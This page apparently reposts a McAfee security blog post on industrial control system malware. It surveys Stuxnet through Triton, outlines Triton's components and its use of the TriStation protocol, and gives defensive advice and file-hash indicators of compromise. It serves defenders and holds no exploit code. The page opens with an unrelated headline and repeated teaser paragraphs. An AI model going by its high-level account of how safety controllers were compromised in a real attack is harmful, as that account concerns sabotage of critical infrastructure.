The post Using Microsoft Powerpoint as Malware Dropper appeared first on Security Affairs.

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we […]

Fighting ICS malware. ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS’s are now exposed to connected environments they were not designed for. Standard McAfee security recommendations (vulnerability….

Fighting ICS malware. ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS’s are now exposed to connected environments they were not designed for. Standard McAfee security recommendations (vulnerability….

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives.

img_1616611348770240.jpg

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.

ICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as for political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.

In August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware—dubbed Triton, Trisis, or HatMan—attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.

After gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an accidental shutdown of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcodes; they completely controlled the target. However, because the attack did not succeed it is possible that a payload, the final stage of the attack, was missing. All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.

History of ICS malware

In 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take the control of the industrial process.

In 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.

BlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.

In 2015, IronGate was discovered on public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet’s. It is unclear if this was a proof of concept or a simple penetration-testing tool.

Industroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of services module. It was crafted for destruction. The attack caused a second shutdown of Ukraine’s power grid.

In 2017, Triton was discovered. The attack did not succeed; the consequences could have been disastrous.

ICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.

Facing widespread risks, critical infrastructures need a specific approach to stay safe.

Triton framework

Triton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). SIS are the last protection against a physical incident.

The attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.

To communicate with SIS controllers, attackers recoded the proprietary TriStation communication protocol on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.

Nozomi Networks has created a Wireshark dissector that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS. Triton requires the “running state” of the controller to perform the next stages of the attack.

In the preceding screen Triconex replies to the request “Get Control Program Status,” which is sent by Triton.

The Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a python script compiled in an exe. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the python scripts required by Triton. Finally, two PowerPC shellcodes (the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.

The following schema shows the main modules of Triton:

The missing payload has not been recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.

How to detect an unusual network connection

Nozomi Networks has created a script that simulates a Triconex safety controller. We modified this script with a Raspberry Pi to create a cheap detector tool.

 

This inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and siren. It also displays the IP address of the connection for further investigation.

The following picture shows how to connect the LED and buzzer.

Fighting ICS malware

ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS’s are now exposed to connected environments they were not designed for.

Standard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.

Further security recommendations:

Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and double factor, card readers, surveillance cameras, etc.
Use DMZ and firewall to prevent network traffic from passing between the corporate and the ICS network
Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges
Log and monitor every action on the ICS network to quickly identify a point of failure
When possible implement redundancy on critical devices to avoid major issues
Develop strong security policies and an incident response plan to restore systems during an incident
Train people with simulated incident responses and security awareness

Attackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected. Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.

 

Indicators of compromise
dc81f383624955e0c0441734f9f1dabfe03f373c: trilog.exe
b47ad4840089247b058121e95732beb82e6311d0: imain.bin
f403292f6cb315c84f84f6c51490e2e8cd03c686: inject.bin
91bad86388c68f34d9a2db644f7a1e6ffd58a449: script_test.py
1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c: library.zip
97e785e92b416638c3a584ffbfce9f8f0434a5fd: TS_cnames.pyc
d6e997a4b6a54d1aeedb646731f3b0893aee4b82: TsBase.pyc
66d39af5d61507cf7ea29e4b213f8d7dc9598bed: TsHi.pyc
a6357a8792e68b05690a9736bc3051cba4b43227: TsLow.pyc
2262362200aa28b0eead1348cb6fda3b6c83ae01: crc.pyc
9059bba0d640e7eeeb34099711ff960e8fbae655: repr.pyc
6c09fec42e77054ee558ec352a7cd7bd5c5ba1b0: select.pyc
25dd6785b941ffe6085dd5b4dbded37e1077e222: sh.pyc
References

One Year After Triton: Building Ongoing, Industry-Wide Cyber Resilience



https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

New TRITON Analysis Tool: Wireshark Dissector for TriStation Protocol


https://github.com/NozomiNetworks/tricotools

The TRITON Malware Framework – Reverse-Engineering a Recent ICS Cyberattack




https://blog.talosintelligence.com/2017/07/template-injection.html
https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN

 

The post Triton Malware Spearheads Latest Generation of Attacks on Industrial Systems appeared first on McAfee Blogs.